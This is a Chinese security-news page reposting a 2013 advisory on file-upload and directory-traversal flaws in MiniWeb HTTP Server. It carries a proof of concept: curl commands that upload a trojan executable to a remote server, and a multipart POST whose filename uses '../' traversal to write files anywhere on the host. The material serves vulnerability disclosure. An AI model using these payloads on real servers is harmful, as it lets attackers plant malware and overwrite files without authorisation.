Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / MiniWeb HTTP Server目录穿越和任意文件上传漏洞

发布日期:2013-04-09
更新日期:2013-04-10受影响系统:
sourceforge MiniWeb HTTP Server 0.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58946
 
MiniWeb是一个针对嵌入式应用而开发的微型Web Server,用C语言编写。
 
MiniWeb HTTP Server 20130309及其他版本存在安全漏洞,攻击者利用该漏洞可上传恶意文件到服务器任意位置。
 
<*来源:Akastep
 
 链接:http://secunia.com/advisories/52923/
       http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Akastep ()提供了如下测试方法:
 
Arbitrary File Upload:
 
user@myhost /cygdrive/c/dir1/dir2
 user@myhost /cygdrive/c/dir1/dir2
 $ curl -I www.example.com
 curl: (52) Empty reply from server
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl www.example.com
 <html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
 width=35%><a href="../">..</a></td><td width=15%>&lt;dir&gt;</td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
 table><hr><i>Directory content generated by MiniWeb</i></body></html>
 user@myhost /cygdrive/c/dir1/dir2
 
$ #Uploading remotely our troyan to remote system.
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe
http://192.168.0.15:8000/epicfail/
 HTTP/1.1 404 Not Found
 Server: MiniWeb
 Content-length: 125
 Content-Type: text/html
 
<html><head><title>404 Not Found</title></head><body><h1>Not
Found</h1><p>The requested URL has no content.</p></body></html>
 user@myhost /cygdrive/c/dir1/dir2
 $ #Now fetching directory index from remote system.
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl www.example.com
 <html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
 width=35%><a href="../">..</a></td><td width=15%>&lt;dir&gt;</td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
 r><td width=35%><a href="taskmgr.exe">taskmgr.exe</a></td><td
width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
 00:14:38 GMT</td></tr></table><hr><i>Directory content generated by
MiniWeb</i></body></html>
 user@myhost /cygdrive/c/dir1/dir2
 user@myhost /cygdrive/c/dir1/dir2
 
$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design
flaw.
 
user@myhost /cygdrive/c/dir1/dir2
 $ curl www.example.com/taskmgr.exe>task2.exe
 user@myhost /cygdrive/c/dir1/dir2
 $ file task2.exe
 task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX
compressed
 
user@myhost /cygdrive/c/dir1/dir2
 $ rm -rf task2.exe
 
METHOD: POST
 URL: http://www.example.com/AAAAAAAAAAAAAAAAAAAAAAA
 
Directory Traversal:
 
Host: www.example.com
 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101
Firefox/20.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: keep-alive
 Content-Type: multipart/form-data;
boundary=---------------------------78522398122376
 Content-Length: 84906
 request body:
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="user"
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="pass"
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="file";
filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
 Content-Type: image/png
 
Dude! Your machine OwnEd!
 
-----------------------------78522398122376
 Content-Disposition: form-data; name="button"
 
Upload
 -----------------------------78522398122376--
 
================================================================================
 
Few Printscreens:
 
1remotesystem.PNG
 
http://s019.radikal.ru/i612/1304/09/510e3b430b04.png
 
2attackersends.PNG
 
http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png
 3remotesystempwned.PNG
 http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png建议:
--------------------------------------------------------------------------------
厂商补丁:
 
sourceforge
 -----------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://miniweb.sourceforge.net/HP Intelligent Management Center "acmServletDownload"信息泄露漏洞WordPress Traffic Analyzer插件"aoid"参数跨站脚本漏洞相关资讯      MiniWeb  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图